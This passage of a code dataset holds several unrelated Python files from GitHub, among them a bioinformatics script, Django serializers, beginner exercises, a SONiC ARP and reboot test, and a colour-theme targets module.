= sitePos + IUPACCodeDict[compliment[sequence[index - 1]]] # Reverse complement\n\tsitePos = set(sitePos) # Remove duplicates\n\tsitePos.discard(\"[\")\n\tsitePos.discard(\"]\")\n\tsiteRegex = \"[\" + \"\".join(list(sitePos)) + \"]\"\n\treturn signatures, indexes, siteRegex\n\n\ndef writeMutations(motifMut, siteMut, outFile, inFile, signature):\n\t\"\"\"\n\tGenerates one or more MAF files (as specified) which contain mutations overlapping the motif or site of interest\n\n\t:param motifMut: A dictionary listing chrom: [positions] for mutations which overlap the signature of interest\n\t:param siteMut: A dictionary listing chrom: [positions] for mutations which overlap the position of interest\n\t:param outFile: A string containing a filepath to the output file for annotated mutations\n\t:param inFile: A string containing a filepath to the original MAF file\n\t:param signature: The signature string, used to label the appended MAF column\n\t\"\"\"\n\n\t# Convert the mutations to sets for fast random lookup of mutations\n\ttmp = {}\n\tfor chrom, variants in motifMut.items():\n\t\ttmp[chrom] = set(variants)\n\tmotifMut = tmp\n\ttmp = {}\n\tfor chrom, variants in siteMut.items():\n\t\ttmp[chrom] = set(variants)\n\tsiteMut = tmp\n\n\twith open(inFile) as f, open(outFile, \"w\") as o:\n\n\t\tfor line in f: # Look at each mutation in the input file\n\n\t\t\toLine = line.rstrip(\"\\n\").rstrip(\"\\r\")\n\t\t\t# Write the header to the output file\n\t\t\tif line.startswith(\"#\") or line.startswith(\"Hugo_Symbol\"):\n\t\t\t\toLine = oLine + \"\\tMutation_Overlap_\" + signature + os.linesep\n\t\t\t\to.write(oLine)\n\t\t\t\tcontinue\n\n\t\t\t# Parse the chromosome and position of each mutation\n\t\t\ttry:\n\t\t\t\tcols = line.split(\"\\t\")\n\t\t\t\tchrom = cols[4]\n\t\t\t\tposition = int(cols[5]) - 1\n\n\t\t\texcept (IndexError, ValueError):\n\t\t\t\traise TypeError(\"Unable to parse input MAF file. 
It may be malformed.\")\n\n\t\t\tvariantOverlap = \"FALSE\"\n\t\t\tif chrom in siteMut and position in siteMut[chrom]:\n\t\t\t\tvariantOverlap = \"SITE\"\n\t\t\telif chrom in motifMut and position in motifMut[chrom]:\n\t\t\t\tvariantOverlap = \"MOTIF\"\n\n\t\t\toLine = oLine + \"\\t\" + variantOverlap + os.linesep\n\t\t\to.write(oLine)\n\n\ndef main(args=None):\n\n\tif args is None:\n\t\targs = getArgs()\n\n\t# Load gene sequences\n\tgeneSequences, geneNames = loadGeneSequences(args.targets, args.reference)\n\n\t# Generate all orientations of the signature sequence\n\tsignatures, mutIndex, siteRegex = complimentSignature(args.signature, args.index)\n\n\t# Load the mutations from the MAF file\n\tmutations, sampleCount = loadMutations(args.maf_file)\n\n\t# Calculates the expected and actual number of mutations that overlap said motif, and the position of interest\n\tmotifMut, siteMut = compareMutRate(geneSequences, geneNames, signatures, siteRegex, mutIndex, mutations, sampleCount, args.output, args.method)\n\n\tif args.annotate_maf is not None:\n\t\twriteMutations(motifMut, siteMut, args.annotate_maf, args.maf_file, args.signature)\n\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"morinlab/lab_scripts","sub_path":"CheckMotifMutBias/CheckMotifMutBias.py","file_name":"CheckMotifMutBias.py","file_ext":"py","file_size_in_byte":17928,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"51"} +{"seq_id":"30919133002","text":"class Borg(object):\n _shared_state = {}\n def __new__(cls, *args, **kwargs):\n obj = super(Borg, cls).__new__(cls, *args, **kwargs)\n obj.__dict__ = cls._shared_state\n return obj\n \n\n\nb = Borg()\nb1 = Borg()\nb.x = 4\n\nprint(\"Borg Object 'b': \", b)\nprint(\"Borg Object 'b1': \", b1)\nprint(\"Object State 'b':\", b.__dict__)\nprint(\"Object State 'b1':\", b1.__dict__)\n","repo_name":"parkilwoo/python_design_pattern","sub_path":"singleton/monostate2.py","file_name":"monostate2.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"71549992160","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nfrom builtins import range\nfrom future.utils import iteritems\nimport logging\n\n\nlog = logging.getLogger()\n\n\nclass Validator(object):\n @staticmethod\n def validate_inventory(device_spec, device_inventory):\n for device_cat, device_dict in iteritems(device_inventory):\n if device_cat not in device_spec:\n log.error('{} not in {}'.format(device_cat, set(device_spec)))\n return False\n device_set = set(device_spec[device_cat])\n for device in device_dict:\n if device not in device_set:\n log.error('{} not in {}'.format(device, device_set))\n return False\n return True\n\n @staticmethod\n def validate_mapping(task_set, device_inventory, mapping):\n inventory = InventoryManager(device_inventory)\n device_set = inventory.get_device_set()\n for task, device in iteritems(mapping):\n if task not in task_set:\n log.error('{} not in {}'.format(task, set(task_set)))\n return False\n if device not in device_set:\n log.error('{} not in {}'.format(device, set(device_set)))\n return False\n return True\n\n\nclass LinkHelper(object):\n _LINK_SYMBOL = ' -> '\n\n @classmethod\n def get_edge(cls, src, dst):\n \"\"\"\n Args:\n src (str)\n dst (str)\n Returns:\n link_str (str): 'src -> dst'\n \"\"\"\n return '{}{}{}'.format(src, 
cls._LINK_SYMBOL, dst)\n\n @classmethod\n def get_nodes(cls, link_str):\n \"\"\"\n Args:\n link_str (str): 'src -> dst'\n Returns:\n src (str)\n dst (str)\n \"\"\"\n src, dst = link_str.split(cls._LINK_SYMBOL)\n return src, dst\n\n\nclass InventoryManager(object):\n\n def __init__(self, inventory, spec=None):\n record, device_map = self._init_inventory_record(inventory)\n self._inventory = inventory\n self._record = record\n self._device_map = device_map\n if spec is None:\n spec = dict({})\n self._spec = spec\n\n def get_device_set(self):\n \"\"\"\n Returns:\n all_devices (set of str): names of all devices\n \"\"\"\n return set(self._device_map)\n\n def get_device_record(self):\n \"\"\"\n Returns:\n device record (dict): categorized device names\n \"\"\"\n return self._record\n\n @staticmethod\n def _gen_device_name(device_type, device_id):\n return '{}.{}'.format(device_type.name, device_id)\n\n @classmethod\n def _init_inventory_record(cls, inventory):\n \"\"\"\n Args:\n inventory (dict)\n Returns:\n Record (dict)\n device_map (dict): {device_name: (device_cat, device_type)}\n \"\"\"\n record = {}\n device_map = {}\n for device_cat, device_dict in iteritems(inventory):\n record[device_cat] = {}\n for device_type, n_device in iteritems(device_dict):\n record[device_cat][device_type] = []\n for device_id in range(n_device):\n device_name = cls._gen_device_name(device_type, device_id)\n record[device_cat][device_type].append(device_name)\n assert device_name not in device_map\n device_map[device_name] = (device_cat, device_type)\n return record, device_map\n\n def reset_inventory_record(self):\n self._record, self._all_devices = (\n self._init_inventory_record(self.inventory))\n\n def pop(self, device_cat, device_type):\n device_list = self._record[device_cat][device_type]\n assert len(device_list) > 0\n return device_list.pop(0) # pop the first item\n\n def push(self, device_name):\n device_cat, device_type = self._device_map[device_name]\n device_list = self._record[device_cat][device_type]\n assert len(device_list) < self._inventory[device_cat][device_type]\n device_list.append(device_name)\n\n def get_spec(self, device_name, item=None):\n device_cat, device_type = self._device_map[device_name]\n if device_cat in self._spec:\n if device_type in self._spec[device_cat]:\n return self._spec[device_cat][device_type]\n log.error('cannot find spec')\n assert False\n return None\n\n def has_device(self, device_name):\n return device_name in self._device_map\n","repo_name":"nesl/Heliot","sub_path":"main/placethings/placethings/config/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":4650,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"51"} +{"seq_id":"23233052449","text":"from django.db import IntegrityError\nfrom django.db.models import Q\n\nfrom rest_framework import serializers\nfrom rest_framework.exceptions import ValidationError\n\nfrom authentication.serializers import AccountSerializer\n\nfrom .models import Project, Order, OrderVM\n\n\nclass ProjectSerializer(serializers.ModelSerializer):\n owner = AccountSerializer(read_only=True, required=False)\n\n class Meta:\n model = Project\n fields = ('id', 'owner', 'name')\n # NOTICE if 'name' is added to read_only_fields, the name column of the POST data will not be available in\n # validated_data, and hence not available to serializer.save(). 
We shall at least have some unique fields\n # ('name' here) excluded from read_only_fields and force user to specify; otherwise we cannot tell whether\n # an object POST'ed by the user is an existing one (yes, the deep reason is that we are implementing a\n # tolerant version of create/POST).\n read_only_fields = ('id', 'owner')\n\n def get_validation_exclusions(self, *args, **kargs):\n exclusions = super(ProjectSerializer, self).get_validation_exclusions()\n return exclusions + ['owner']\n\n def create(self, validated_data):\n project, _ = Project.objects.get_or_create(**validated_data)\n return project\n\n\nclass OrderVMSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = OrderVM\n fields = ('id', 'name', 'sockets', 'cpus_per_socket', 'memory_GB', 'nics')\n read_only_fields = ()\n\n def get_validation_exclusions(self, *args, **kargs):\n exclusions = super(OrderVMSerializer, self).get_validation_exclusions()\n return exclusions + []\n\n\nclass OrderSerializer(serializers.ModelSerializer):\n project = ProjectSerializer()\n VMs = OrderVMSerializer(many=True, required=False)\n\n class Meta:\n model = Order\n fields = ('id', 'project', 'is_active', 'created_at', 'updated_at', 'VMs')\n read_only_fields = ('created_at', 'updated_at')\n\n def get_validation_exclusions(self, *args, **kargs):\n exclusions = super(OrderSerializer, self).get_validation_exclusions()\n return exclusions + ['project', 'VMs']\n\n def create(self, validated_data):\n # The validators ensures existence of the data element for us, therefore calls to pop() needs no default values.\n VMs_data = validated_data.pop('VMs')\n project_data = validated_data.pop('project')\n is_active = validated_data.pop('is_active')\n owner = validated_data.pop('owner')\n # The project may or may not exist, create a one if necessary\n project, _ = Project.objects.get_or_create(owner=owner, **project_data)\n\n # TODO thread-safety\n vm_names = [d['name'] for d in VMs_data]\n vms = OrderVM.objects.filter(Q(project__exact=project) & Q(name__in=vm_names))\n if vms:\n raise ValidationError(\"VMs with the name(s) %s already exist in the project '%s'\" %(\n ', '.join([\"'%s'\" % vm.name for vm in vms]), project.name))\n\n # There is really nothing unique about an order, just create().\n order = Order.objects.create(project=project, is_active=is_active, **validated_data)\n for d in VMs_data:\n OrderVM.objects.create(project=project, order=order, **d)\n return order\n\n def update(self, instance, validated_data):\n # The validators ensures existence of the data element for us, therefore calls to pop() needs no default values.\n project_data = validated_data.pop('project')\n is_active = validated_data.pop('is_active')\n owner = validated_data.pop('owner')\n VMs_data = validated_data.pop('VMs')\n\n try:\n project = Project.objects.get(owner=owner, **project_data)\n if project != instance.project:\n raise ValidationError('the project of the order cannot be mutated')\n except Project.DoesNotExist:\n raise ValidationError('the project of the order cannot be mutated (to an nonexisting one)')\n\n names = [d['name'] for d in VMs_data]\n all_vms = OrderVM.objects.filter(Q(project__exact=project) & Q(name__in=names))\n for d in VMs_data:\n name = d.pop('name')\n # shall contain at most one element, due to uniqueness of (project, name)\n vms = all_vms.filter(Q(name__exact=name))\n if not vms:\n OrderVM.objects.create(project=project, order=instance, name=name, **d)\n elif len(vms) == 1:\n vm = vms[0]\n if vm.order != instance:\n raise ValidationError(\n 
\"the VM with name '%s' within project '%s' is already defined in another order '%s\" % (\n name, project.id, vm.order.id))\n else:\n for attr, value in d.items():\n setattr(vm, attr, value)\n vm.save()\n else:\n raise\n\n instance.is_active = is_active\n instance.save()\n return instance\n","repo_name":"sunrenjie/bangus","sub_path":"workflow/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":5100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"45771698882","text":"# Exercício Python 038: Escreva um programa que leia dois números inteiros e compare-os. mostrando na tela uma mensagem:\n# - O primeiro valor é maior\n# - O segundo valor é maior\n# - Não existe valor maior, os dois são iguais\n\nlimpa = '\\033[m'\nazul = '\\033[34m'\namarelo = '\\033[33m'\n\nprint('{:-^40}'.format('Digite dois valores'))\n\nn1 = int(input('Primeiro valor: '))\nn2 = int(input('Segundo valor: '))\n\nif n1 == n2:\n print('Os {1}DOIS{0} são {2}IGUAIS!{0}'.format(limpa, amarelo, azul))\nelif n1 > n2:\n print('O {1}PRIMEIRO{0} é {2}MAIOR{0} que o {1}SEGUNDO{0}'.format(\n limpa, amarelo, azul))\nelse:\n print('O {1}SEGUNDO{0} é {2}MAIOR{0} que o {1}PRIMEIRO{0}'.format(\n limpa, amarelo, azul))\n","repo_name":"ARRETdaniel/Python_exerc-cios","sub_path":"Exercícios/ex038-igual-ou-maior.py","file_name":"ex038-igual-ou-maior.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"25945656437","text":"class Solution(object):\n def combinationSum(self, candidates, target):\n \"\"\"\n :type candidates: List[int]\n :type target: int\n :rtype: List[List[int]]\n \"\"\"\n result = []\n\n\n def dfs(elem, v):\n if sum(elem) == target:\n result.append(elem[:])\n return\n elif sum(elem) > target:\n return\n\n\n for i in range(v, len(candidates)):\n if candidates[i] == 0:\n return\n elem.append(candidates[i])\n dfs(elem, i)\n elem.pop()\n\n\n dfs([], 0)\n \n return result","repo_name":"wndudrla1011/LeetCode","sub_path":"39-combination-sum/39-combination-sum.py","file_name":"39-combination-sum.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"3908617004","text":"import pytest\n\nfrom spytest import st, tgapi, SpyTestDict\n\nimport apis.routing.arp as arp_obj\nimport apis.system.reboot as rb_obj\nimport apis.system.basic as basic_obj\nimport apis.routing.ip as ip_obj\nimport apis.routing.bgp as bgp_obj\n\nfrom utilities.common import poll_wait\n\ndef init_vars():\n global vars\n vars = st.ensure_min_topology(\"D1T1:2\")\n\ndef initialize_variables():\n global data\n data = SpyTestDict()\n data.static_arp_mac = \"00:00:00:00:00:66\"\n data.static_arp_ip = \"192.168.12.2\"\n data.ipv4_address_tgen = \"10.10.10.2\"\n data.ipv4_address = \"10.10.10.1\"\n data.ipv4_address_network = \"20.20.20.0/24\"\n data.mask = \"24\"\n data.src_mac_addr = \"00:00:01:02:03:04\"\n data.ipv4_address_1 = \"192.168.12.1\"\n\ndef get_parms():\n data.platform = basic_obj.get_hwsku(vars.D1)\n data.constants = st.get_datastore(vars.D1, \"constants\", \"default\")\n\n@pytest.fixture(scope=\"module\", autouse=True)\ndef arp_static_route_reboot_module_hooks(request):\n # add things at the start of this module\n init_vars()\n initialize_variables()\n get_parms()\n\n global tg_handler\n tg_handler = tgapi.get_handles_byname(\"T1D1P1\", \"T1D1P2\")\n global tg\n tg = 
tg_handler[\"tg\"]\n st.log(\"configuring static route\")\n adding_static_route()\n st.log(\"Getting ARP entry dynamically\")\n adding_dynamic_arp()\n ip_obj.config_ip_addr_interface(vars.D1, vars.D1T1P2, data.ipv4_address_1, data.mask, family=\"ipv4\", config='add')\n st.log(\"Configuring static ARP\")\n arp_obj.add_static_arp(vars.D1, data.static_arp_ip, data.static_arp_mac, vars.D1T1P2)\n st.log(\"Verifying static route entries before save and reboot/fast-reboot/warm-reboot\")\n static_route_verify()\n st.log(\"Verifying dynamic ARP entries before save and reboot/fast-reboot/warm-reboot\")\n if not arp_obj.verify_arp(vars.D1, data.ipv4_address_tgen, data.src_mac_addr, vars.D1T1P1):\n st.report_fail(\"ARP_entry_dynamic_entry_fail\", data.ipv4_address_tgen, vars.D1)\n else:\n st.log(\"Verified that dynamic ARP entry is present in arp table\")\n st.log(\"Verifying static ARP entries before save and reboot/fast-reboot/warm-reboot\")\n if not arp_obj.verify_arp(vars.D1, data.static_arp_ip, data.static_arp_mac, \"\"):\n st.report_fail(\"static_arp_create_fail\", vars.D1)\n else:\n st.log(\"Verified that static ARP entry is present in arp table\")\n st.log(\"Save the config on the DUT\")\n rb_obj.config_save(vars.D1)\n st.log(\"saving config in vtysh mode to save static route\")\n rb_obj.config_save(vars.D1, shell=\"vtysh\")\n yield\n # Below step will clear IP adresses configured on different interfaces in the device\n ip_obj.clear_ip_configuration(st.get_dut_names())\n #Below step will clear static route configured in the device\n ip_obj.delete_static_route(vars.D1, data.ipv4_address_tgen, data.ipv4_address_network, family='ipv4', shell=\"vtysh\")\n #Below step will delete static arp entries configured in the device\n arp_obj.delete_static_arp(vars.D1, data.static_arp_ip, vars.D1T1P2)\n\n@pytest.fixture(scope=\"function\", autouse=True)\ndef arp_static_route_reboot_func_hooks(request):\n # add things at the start every test case\n # use 'st.get_func_name(request)' to compare\n # if any thing specific a particular test case\n yield\n # add things at the end every test case\n # use 'st.get_func_name(request)' to compare\n # if any thing specific a particular test case\n\ndef adding_static_route():\n st.log(\"About to add ipv4 address on TGen connected interface\")\n ip_obj.config_ip_addr_interface(vars.D1, vars.D1T1P1, data.ipv4_address, data.mask, family=\"ipv4\", config='add')\n st.log(\"Enabling docker routing config mode to split\")\n bgp_obj.enable_docker_routing_config_mode(vars.D1)\n st.log(\"configuring static route via vtysh mode\")\n ip_obj.create_static_route(vars.D1, data.ipv4_address_tgen, data.ipv4_address_network, shell=\"vtysh\", family=\"ipv4\")\n\ndef static_route_verify():\n st.log(\"Ip address configuration verification\")\n if not poll_wait(ip_obj.verify_interface_ip_address, 60, vars.D1, vars.D1T1P1, \"{}/{}\".format(data.ipv4_address, data.mask),\n family=\"ipv4\"):\n st.report_fail(\"ip_routing_int_create_fail\", vars.D1T1P1)\n else:\n st.log(\"Successfully added ipv4 address on TGen connected interface\")\n\n st.log(\"static route configuration verification\")\n if not poll_wait(ip_obj.verify_ip_route, 60, vars.D1, \"ipv4\", ip_address=data.ipv4_address_network, type=\"S\"):\n st.error(\"Static route - {} information not exists.\".format(data.ipv4_address_network))\n st.report_fail(\"ip_static_route_create_fail\", data.ipv4_address_network)\n else:\n st.log(\"creation of static route is successful\")\n\ndef adding_dynamic_arp():\n data.h1 = 
tg.tg_interface_config(port_handle=tg_handler[\"tg_ph_1\"], mode='config', intf_ip_addr=data.ipv4_address_tgen,\n gateway=data.ipv4_address, src_mac_addr=data.src_mac_addr, arp_send_req='1')\n st.log(\"INTFCONF: \" + str(data.h1))\n st.log(\"Pinging from tgen to DUT's TGen connected IPV4 interface\")\n res = tgapi.verify_ping(src_obj=tg, port_handle=tg_handler[\"tg_ph_1\"], dev_handle=data.h1['handle'], dst_ip=data.ipv4_address,\n ping_count='1', exp_count='1')\n st.log(\"PING_RES: \" + str(res))\n if res:\n st.log(\"Ping succeeded.\")\n else:\n st.log(\"Ping failed.\")\n st.wait(5)\n if not arp_obj.show_arp(vars.D1, data.ipv4_address_tgen):\n st.report_fail(\"ARP_entry_dynamic_entry_fail\", data.ipv4_address_tgen, vars.D1)\n\ndef test_ft_arp_static_route_config_mgmt_verifying_config_with_warm_reboot():\n '''\n Author: Surendra Kumar Vella(surendrakumar.vella@broadcom.com)\n Verify static ARP route config after warm-reboot\n '''\n\n st.log(\"Checking whether the platform supports warm-reboot\")\n if not data.platform.lower() in data.constants['WARM_REBOOT_SUPPORTED_PLATFORMS']:\n st.report_unsupported('test_case_unsupported')\n st.log(\"Performing warm-reboot on DUT\")\n st.reboot(vars.D1, \"warm\")\n st.log(\"Verifying static route entries after save and warm-reboot\")\n st.wait(5)\n static_route_verify()\n st.log(\"Verifying dynamic ARP entries after save and warm-reboot\")\n if not arp_obj.verify_arp(vars.D1, data.ipv4_address_tgen, data.src_mac_addr, vars.D1T1P1):\n st.report_fail(\"ARP_entry_dynamic_entry_fail\", data.ipv4_address_tgen, vars.D1)\n else:\n st.log(\"Verified that dynamic ARP entry is present in arp table\")\n if st.get_ui_type(vars.D1) != \"click\":\n st.log(\"Verifying static ARP entries after save and warm-reboot\")\n if not arp_obj.verify_arp(vars.D1, data.static_arp_ip, data.static_arp_mac, \"\"):\n st.report_fail(\"static_arp_create_fail\", vars.D1)\n else:\n st.log(\"Verified that static ARP entry is present in arp table\")\n st.report_pass(\"test_case_passed\")\n\ndef test_ft_arp_static_route_config_mgmt_verifying_config_with_save_fast_reboot():\n '''\n Author: Surendra Kumar Vella(surendrakumar.vella@broadcom.com)\n Verify static ARP route config after save fast-reboot\n '''\n st.log(\"Performing fast-reboot on DUT\")\n st.reboot(vars.D1, \"fast\")\n st.log(\"Verifying static route entries after save and fast-reboot\")\n st.wait(5)\n static_route_verify()\n adding_dynamic_arp()\n st.log(\"Verifying dynamic ARP entries after save and fast-reboot\")\n if not arp_obj.verify_arp(vars.D1, data.ipv4_address_tgen, data.src_mac_addr, vars.D1T1P1):\n st.report_fail(\"ARP_entry_dynamic_entry_fail\", data.ipv4_address_tgen, vars.D1)\n else:\n st.log(\"Verified that dynamic ARP entry is present in arp table\")\n st.report_pass(\"test_case_passed\")\n\n\ndef test_ft_arp_static_route_config_mgmt_verifying_config_with_save_reboot():\n '''\n Author: Surendra Kumar Vella(surendrakumar.vella@broadcom.com)\n Verify static ARP route config after save cold-reboot\n '''\n st.log(\"Performing reboot on DUT\")\n st.reboot(vars.D1)\n st.log(\"Verifying static route entries after save and reboot\")\n st.wait(5)\n static_route_verify()\n adding_dynamic_arp()\n st.log(\"Verifying dynamic ARP entries after save and reboot\")\n if not arp_obj.verify_arp(vars.D1, data.ipv4_address_tgen, data.src_mac_addr, vars.D1T1P1):\n st.report_fail(\"ARP_entry_dynamic_entry_fail\", data.ipv4_address_tgen, vars.D1)\n else:\n st.log(\"Verified that dynamic ARP entry is present in arp table\")\n 
st.report_pass(\"test_case_passed\")\n","repo_name":"sonic-net/sonic-mgmt","sub_path":"spytest/tests/routing/test_arp_static_route_long_run.py","file_name":"test_arp_static_route_long_run.py","file_ext":"py","file_size_in_byte":8582,"program_lang":"python","lang":"en","doc_type":"code","stars":161,"dataset":"github-code","pt":"51"} +{"seq_id":"25906283036","text":"# function in python\n\n# Non - Parameterized\ndef addNumbers():\n a = int(input('Enter first number'))\n b = int(input('Enter 2nd number'))\n print(a+b)\n\n\n# Parameterized\ndef addNumbersP(a, b):\n return a+b\n\n# num1 = input('Enter first number')\n# print(num1.isalnum())\n\n# num1 = int(input('Enter first number'))\n# num2 = int(input('Enter 2nd number'))\nprint()\n# result = addNumbersP(num1, num2)\n\n# if result > 100:\n# print(result)\n\n# def checkOddEven():\n# a = int(input('Enter a number'))\n# if a%2 == 0:\n# print('Given number is Even')\n# else:\n# print('Given number is Odd')\n\n# checkOddEven()\n\n# def checkOddEvenP(a):\n# if a%2 == 0:\n# print('Given number is Even')\n# else:\n# print('Given number is Odd')\n\n# num = int(input('Enter a number'))\n# checkOddEvenP(num)\n\n\nimport random\n\ndef wordgame(words):\n score = 0\n for i in words:\n w = list(i)\n random.shuffle(w)\n print(w)\n a = input('Enter: ')\n if a == i:\n score += 1\n return score\n\nfruits = ['apple', 'orange', 'grapes', 'banana', 'pineapple']\nresult = wordgame(fruits)\nprint('Your Score is: ', result)","repo_name":"mesujitg/python_march_2022","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"18672232689","text":"import random\nclass Asteroide:\n def __init__(asteroide):\n asteroide.x = 0\n asteroide.y = 0\n asteroide.raio = 0\n\n\n\n def imprimeValores(asteroide):\n print(\"posição x\", asteroide.x, \"posição y\", asteroide.y, \"raio\", asteroide.raio)\n\n def PosRaioRamdom(asteroide,telaX,telaY):\n asteroide.raio = random.randint(1, 40)\n asteroide.x = random.randint(asteroide.raio*2,telaX-asteroide.raio*2)\n asteroide.y = random.randint(asteroide.raio*2,telaY-asteroide.raio*2)\n\n def lista(asteroide):\n asteroide1 = Asteroide()\n asteroide2 = Asteroide()\n asteroide3 = Asteroide()\n asteroide4 = Asteroide()\n asteroide5 = Asteroide()\n listaAsteroide = {asteroide1, asteroide2, asteroide3, asteroide4, asteroide5}\n return listaAsteroide\n\n def cores(asteroide):\n #BLACK = (0, 0, 0)\n WHITE = (255, 255, 255)\n GREEN = (0, 255, 0)\n RED = (255, 0, 0)\n SPREENGGREEN = (0, 255, 127)\n INDIGO = (75, 0, 130)\n listaCores = {WHITE, GREEN, RED, SPREENGGREEN, INDIGO}\n return listaCores","repo_name":"welgt/Exercicios_python_pi2_Dp","sub_path":"Aula06/Asteroide.py","file_name":"Asteroide.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"35902436012","text":"\"\"\"\n.. role:: python(code)\n :language: python\n\nThis module defines all the methods needed to interact with all the targets\nimplemented in the :mod:`hapycolor.targets` package.\n\nTo add a new target, a class inheriting from :class:`base.Target` needs to be\nimplemented and its module should be imported in this very module, else,\nhapycolor will fail to find the new target. Currently, the :func:`reconfigure`\nfunction needs the class to be named after a PascalCase version of its module's\nname.\n\n.. 
note::\n A list `__all__` could be used to define all the modules to be imported and\n then :python:`from . import *` would import them all, but strangely,\n in this case, sphinx_ fails to generate the documentation of this file.\n\n.. _sphinx: http://www.sphinx-doc.org/en/stable/\n\n.. note:: Maybe, a future version of this project would be able to get rid of\n the class name/module name constraint by analyzing the classes contained\n in the module and retrieving the one that implements :class:`base.Target`.\n\"\"\"\n\nimport platform\nimport enum\nimport re\nfrom hapycolor import config\nfrom hapycolor import exceptions\nfrom hapycolor.targets import vim, iterm, wallpaper, lightline, gnome_terminal, \\\n yabar, i3, rofi, base\n\n\ndef initialize_target(target):\n \"\"\"\n Initializes a given target. If the intialization is successful, i.e. the\n user entered a correct information, then, the target's section 'enabled' of\n the configuration file will be saved as 'True', in addition of saving other\n possible data. Else, the former section will be marked as 'False'.\n\n :arg target: one of the subclasses of :class:`Target`\n \"\"\"\n print(\"Initializing {}\".format(target.__name__))\n while not target.is_config_initialized():\n try:\n target.initialize_config()\n except exceptions.WrongInputError as e:\n print(e.msg)\n if not retry():\n break\n\ndef reconfigure(target):\n while 1:\n try:\n target.reconfigure()\n break\n except exceptions.WrongInputError as e:\n print(e.msg)\n if not retry():\n break\n\n\ndef is_target_subclass(clazz):\n try:\n return issubclass(clazz, base.Target)\n except TypeError:\n return False\n\n\ndef get_class(target_str):\n \"\"\"\n Returns the class which name correspond to the string\n\n :param target_str: a string representing a target module.\n :raise: raises an :exc:`exceptions.InvalidTarget` if a module cannot be\n resolve from the provided string, or if there are no matching classes\n defined in the module that implement a :class:`Target`.\n \"\"\"\n def convert(name):\n \"\"\"Convert PascalCase to snake_case\"\"\"\n s1 = re.sub('(.)([A-Z][a-z]+)', r'\\1_\\2', name)\n return re.sub('([a-z0-9])([A-Z])', r'\\1_\\2', s1).lower()\n\n msg = \"Input {} does not match a module containing a Target class\".format(target_str)\n try:\n clazz = eval(convert(target_str) + \".\" + target_str)\n except (AttributeError, NameError) as err:\n raise exceptions.InvalidTarget(msg) from err\n\n if not is_target_subclass(clazz):\n raise exceptions.InvalidTarget(msg)\n return clazz\n\n\ndef retry():\n \"\"\"\n When initializing targets, asks for a retry if the user failed\n to enter correct inputs. This class is usefull in order to\n test the targets' initializations\n \"\"\"\n return input(\"\\nAbort? 
(y/n): \").lower() == \"n\"\n\n\ndef get_all_names():\n \"\"\"\n Get all target names\n \"\"\"\n all_targets = base.Target.__subclasses__()\n return [t.__name__ for t in all_targets]\n\n\nclass OS(enum.Enum):\n LINUX = 0\n DARWIN = 1\n\n\ndef os():\n platform_os = platform.system()\n if platform_os == \"Darwin\":\n return OS.DARWIN\n elif platform_os == \"Linux\":\n return OS.LINUX\n else:\n raise exceptions.PlatformNotSupportedError()\n\n\ndef get_compatible():\n \"\"\"\n Get all compatible targets\n \"\"\"\n all_targets = base.Target.__subclasses__()\n # Filters out the incompatible or disabled targets\n return list(filter(lambda t: os() in t.compatible_os(),\n all_targets))\n\n\ndef get_compatible_names():\n \"\"\"\n Get str names of all compatible targets\n \"\"\"\n return [t.__name__ for t in get_compatible()]\n\n\ndef get_enabled():\n \"\"\"\n Get all enabled targets\n \"\"\"\n all_targets = base.Target.__subclasses__()\n return list(filter(lambda t: t.is_enabled() == True, all_targets))\n\n\ndef get():\n return base.Target.__subclasses__()\n\n\ndef export(palette, image_path):\n \"\"\"\n Exports a palette to all the compatible and enabled targets\n \"\"\"\n targets = get_compatible()\n for t in targets:\n if t.is_enabled():\n print(\"Exporting: \", t.__name__)\n try:\n t.export(palette, image_path)\n except exceptions.ExportTargetFailure as e:\n print(str(e))\n e.disable_target()\n","repo_name":"rvdz/hapycolor","sub_path":"hapycolor/targets/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4989,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"23652800094","text":"import itertools\nimport json\nimport math\nimport os\nimport sys\nfrom enum import Enum\nfrom typing import List\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom pytext.common.constants import Stage\nfrom pytext.config import ConfigBase\nfrom pytext.config.component import Component, ComponentType\nfrom pytext.models.crf import CRF\nfrom pytext.models.model import Model\nfrom pytext.utils import timing\nfrom pytext.utils.file_io import PathManager\n\n\nclass State(Enum):\n ANALYSIS = \"Analysis\"\n OTHERS = \"Others\"\n\n\nclass Sparsifier(Component):\n __COMPONENT_TYPE__ = ComponentType.SPARSIFIER\n __EXPANSIBLE__ = True\n\n class Config(ConfigBase):\n pass\n\n def sparsify(self, *args, **kwargs):\n pass\n\n def sparsification_condition(self, *args, **kwargs):\n pass\n\n def get_sparsifiable_params(self, *args, **kwargs):\n pass\n\n def initialize(self, *args, **kwargs):\n pass\n\n def op_pre_epoch(self, *args, **kwargs):\n pass\n\n def save_model_state_for_all_rank(self):\n return False\n\n def get_current_sparsity(self, model: Model) -> float:\n trainable_params = sum(p.numel() for p in model.parameters() if p.requires_grad)\n nonzero_params = sum(\n p.nonzero().size(0) for p in model.parameters() if p.requires_grad\n )\n return (trainable_params - nonzero_params) / trainable_params\n\n\nclass L0_projection_sparsifier(Sparsifier):\n \"\"\"\n L0 